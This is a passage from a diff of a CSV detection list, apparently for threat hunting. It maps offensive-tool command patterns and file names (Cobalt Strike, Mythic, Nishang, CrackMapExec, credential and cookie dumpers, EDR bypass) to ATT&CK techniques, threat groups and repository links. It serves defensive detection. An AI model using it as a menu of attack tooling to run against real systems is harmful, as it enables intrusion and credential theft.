with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Exec-Command-Silent.vbs*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" -"*--exec-method smbexec*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*--exec-method smbexec*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*execmethod*PowerPick*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*execmethod*PowerShell*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*execPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*execPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*Executable_Files-main.zip*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*execute_assembly -Assembly *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*execute_assembly SharpCloud*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*execute_bof *","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" -"*execute_dotnet_assembly.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*execute_dotnet_assembly.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*execute_pe -PE*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*execute_Pezor*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*execute_shellcode *","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*Execute-ACLight.bat*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Execute-ACLight2.bat*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" -"*execute-assembly *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*execute-assembly *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*execute-assembly *.exe *","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*execute-assembly *asreproast*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*execute-assembly *kerberoast*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*execute-assembly SharpBlock*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*execute-assembly*Seatbelt*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*execute-assembly*sharpcookiemonster*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" -"*execute-assembly*sigflip*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*execute-assembly*sigflip*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*ExecuteAssembly.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*executeAssembly.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*execute-assembly.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*Execute-Command-MSSQL*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Execute-DNSTXT-Code*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*execute-dotnet-assembly*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*execute-pe.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" -"*executepersistence*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*executeAssembly.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*execute-assembly.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Execute-Command-MSSQL*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Execute-DNSTXT-Code*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*execute-dotnet-assembly*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*execute-pe.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*executepersistence*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*execute-Pezor*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 